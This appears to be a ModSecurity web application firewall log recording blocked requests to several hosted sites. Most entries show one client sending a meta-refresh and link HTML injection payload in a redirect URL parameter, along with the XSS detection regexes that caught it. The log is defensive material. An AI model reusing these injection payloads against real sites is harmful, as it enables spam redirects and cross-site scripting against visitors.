[Tue May 12 01:50:02.559364 2026] [security2:error] [pid 1730175:tid 1730200] [client 216.73.216.110:23736] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJrKno6NvB9WXx5V-5ubgAAARc"]
[Tue May 12 01:50:02.651520 2026] [security2:error] [pid 1730175:tid 1730200] [client 216.73.216.110:23736] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): XSS Filter - Category 3: Attribute Vector"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJrKno6NvB9WXx5V-5ubgAAARc"]
[Tue May 12 01:50:06.074356 2026] [security2:error] [pid 1730207:tid 1730229] [client 27.78.84.116:62087] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ttps:/olv.elupc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrLjue9Sp-pIv_Bb6BbQAAAVQ"]
[Tue May 12 01:50:06.075038 2026] [security2:error] [pid 1730207:tid 1730229] [client 27.78.84.116:62087] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrLjue9Sp-pIv_Bb6BbQAAAVQ"]
[Tue May 12 01:50:06.075205 2026] [security2:error] [pid 1730207:tid 1730229] [client 27.78.84.116:62087] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WAS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrLjue9Sp-pIv_Bb6BbQAAAVQ"]
[Tue May 12 01:50:06.075322 2026] [security2:error] [pid 1730207:tid 1730229] [client 27.78.84.116:62087] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag " [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrLjue9Sp-pIv_Bb6BbQAAAVQ"]
[Tue May 12 01:50:06.075505 2026] [security2:error] [pid 1730207:tid 1730229] [client 27.78.84.116:62087] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-2 [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrLjue9Sp-pIv_Bb6BbQAAAVQ"]
[Tue May 12 01:50:06.075914 2026] [security2:error] [pid 1730207:tid 1730229] [client 27.78.84.116:62087] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrLjue9Sp-pIv_Bb6BbQAAAVQ"]
[Tue May 12 01:50:06.076176 2026] [security2:error] [pid 1730207:tid 1730229] [client 27.78.84.116:62087] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrLjue9Sp-pIv_Bb6BbQAAAVQ"]
[Tue May 12 01:50:22.164717 2026] [security2:error] [pid 1709071:tid 1709098] [client 27.78.84.116:62234] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ttps:/olv.elupc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrPrvMumyrWMfSu7qbmAAAAMs"]
[Tue May 12 01:50:22.165606 2026] [security2:error] [pid 1709071:tid 1709098] [client 27.78.84.116:62234] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrPrvMumyrWMfSu7qbmAAAAMs"]
[Tue May 12 01:50:22.165795 2026] [security2:error] [pid 1709071:tid 1709098] [client 27.78.84.116:62234] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WAS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrPrvMumyrWMfSu7qbmAAAAMs"]
[Tue May 12 01:50:22.165899 2026] [security2:error] [pid 1709071:tid 1709098] [client 27.78.84.116:62234] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag " [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrPrvMumyrWMfSu7qbmAAAAMs"]
[Tue May 12 01:50:22.166073 2026] [security2:error] [pid 1709071:tid 1709098] [client 27.78.84.116:62234] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-2 [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrPrvMumyrWMfSu7qbmAAAAMs"]
[Tue May 12 01:50:22.166500 2026] [security2:error] [pid 1709071:tid 1709098] [client 27.78.84.116:62234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrPrvMumyrWMfSu7qbmAAAAMs"]
[Tue May 12 01:50:22.166776 2026] [security2:error] [pid 1709071:tid 1709098] [client 27.78.84.116:62234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrPrvMumyrWMfSu7qbmAAAAMs"]
[Tue May 12 01:50:23.345030 2026] [security2:error] [pid 1695975:tid 1695980] [client 27.78.84.116:63521] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ttps:/olv.elupc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrP9VI9ymHBxup749_wQAAAII"]
[Tue May 12 01:50:23.346455 2026] [security2:error] [pid 1695975:tid 1695980] [client 27.78.84.116:63521] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrP9VI9ymHBxup749_wQAAAII"]
[Tue May 12 01:50:23.347344 2026] [security2:error] [pid 1695975:tid 1695980] [client 27.78.84.116:63521] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WAS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrP9VI9ymHBxup749_wQAAAII"]
[Tue May 12 01:50:23.350350 2026] [security2:error] [pid 1695975:tid 1695980] [client 27.78.84.116:63521] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag " [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrP9VI9ymHBxup749_wQAAAII"]
[Tue May 12 01:50:23.350551 2026] [security2:error] [pid 1695975:tid 1695980] [client 27.78.84.116:63521] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-2 [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrP9VI9ymHBxup749_wQAAAII"]
[Tue May 12 01:50:23.350961 2026] [security2:error] [pid 1695975:tid 1695980] [client 27.78.84.116:63521] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrP9VI9ymHBxup749_wQAAAII"]
[Tue May 12 01:50:23.352037 2026] [security2:error] [pid 1695975:tid 1695980] [client 27.78.84.116:63521] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrP9VI9ymHBxup749_wQAAAII"]
[Tue May 12 01:50:24.067417 2026] [security2:error] [pid 1691274:tid 1691299] [client 27.78.84.116:63578] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ttps:/olv.elupc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQFfdQaraX_prmqcQnAAAABg"]
[Tue May 12 01:50:24.067786 2026] [security2:error] [pid 1691274:tid 1691299] [client 27.78.84.116:63578] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag 